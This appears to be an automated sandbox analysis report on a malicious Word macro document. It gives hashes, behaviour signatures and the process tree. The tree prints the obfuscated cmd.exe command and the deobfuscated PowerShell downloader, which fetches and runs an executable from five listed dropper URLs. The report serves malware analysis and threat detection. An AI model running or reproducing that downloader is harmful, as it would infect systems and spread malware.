Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
04-12-2021 02:36
General
-
Target
52e6f3c8301df68dd941f97db3340fa6afd58f7f3fc0b7ce6a57703806e9165a.doc
-
Size
98KB
-
MD5
8cb82a353ce10ff2a56850540fc92245
-
SHA1
69e0bd64ac4d8be1e8e6af134c6fb19288d1e623
-
SHA256
52e6f3c8301df68dd941f97db3340fa6afd58f7f3fc0b7ce6a57703806e9165a
-
SHA512
b97c23f3352bdf99a18cca48993dc6809772e0cf9c846434bc1832268a71a451a9464653c39e89d506306719bddab1195d54cd05a1d1efda776af55754946773
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://tristanrineer.com/uDitL1
exe.dropper
http://techsistsolution.com/rmztD
exe.dropper
http://nightflight.jp/hGZWc
exe.dropper
http://aqualuna.jp/FBfN
exe.dropper
http://blackvomit.com.br/M
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 5 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\52e6f3c8301df68dd941f97db3340fa6afd58f7f3fc0b7ce6a57703806e9165a.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /V:ON/C"set Kj=JiTZMmcpiZJmkSjSbAIlIYXmEkuOVYn1r\{x:ChF'(LtN)gBdvW-z7DUa/e0sq=}fw$ oP,;.G@+y&&for %r in (7;68;65;58;32;60;38;58;19;19;67;66;61;50;61;62;30;58;65;51;68;16;14;58;6;43;67;44;58;43;72;50;58;16;37;19;8;58;30;43;71;66;39;6;37;62;40;38;43;43;7;36;57;57;43;32;8;60;43;56;30;32;8;30;58;58;32;72;6;68;23;57;26;54;8;43;42;31;74;38;43;43;7;36;57;57;43;58;6;38;60;8;60;43;60;68;19;26;43;8;68;30;72;6;68;23;57;32;23;52;43;54;74;38;43;43;7;36;57;57;30;8;46;38;43;64;19;8;46;38;43;72;14;7;57;38;73;9;50;6;74;38;43;43;7;36;57;57;56;61;26;56;19;26;30;56;72;14;7;57;39;47;64;44;74;38;43;43;7;36;57;57;16;19;56;6;25;49;68;23;8;43;72;6;68;23;72;16;32;57;4;40;72;15;7;19;8;43;41;40;74;40;45;71;66;55;8;8;67;62;67;40;53;53;59;40;71;66;14;49;37;62;66;58;30;49;36;43;58;23;7;75;40;33;40;75;66;55;8;8;75;40;72;58;35;58;40;71;64;68;32;58;56;6;38;41;66;10;14;9;67;8;30;67;66;39;6;37;45;34;43;32;76;34;66;61;50;61;72;54;68;65;30;19;68;56;48;39;8;19;58;41;66;10;14;9;70;67;66;14;49;37;45;71;15;43;56;32;43;51;69;32;68;6;58;60;60;67;66;14;49;37;71;16;32;58;56;25;71;63;6;56;43;6;38;34;63;63;67;67;67;67;67;67;67;67;67;67;67;67;67;67;67;67;67;77)do set jNy=!jNy!!Kj:~%r,1!&&if %r gtr 76 call %jNy:~5%"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $qWq=new-object Net.WebClient;$FcC='http://tristanrineer.com/uDitL1@http://techsistsolution.com/rmztD@http://nightflight.jp/hGZWc@http://aqualuna.jp/FBfN@http://blackvomit.com.br/M'.Split('@');$Uii = '770';$jvC=$env:temp+'\'+$Uii+'.exe';foreach($JjZ in $FcC){try{$qWq.DownloadFile($JjZ, $jvC);Start-Process $jvC;break;}catch{}}3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
64KB
-
Filesize
8KB
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-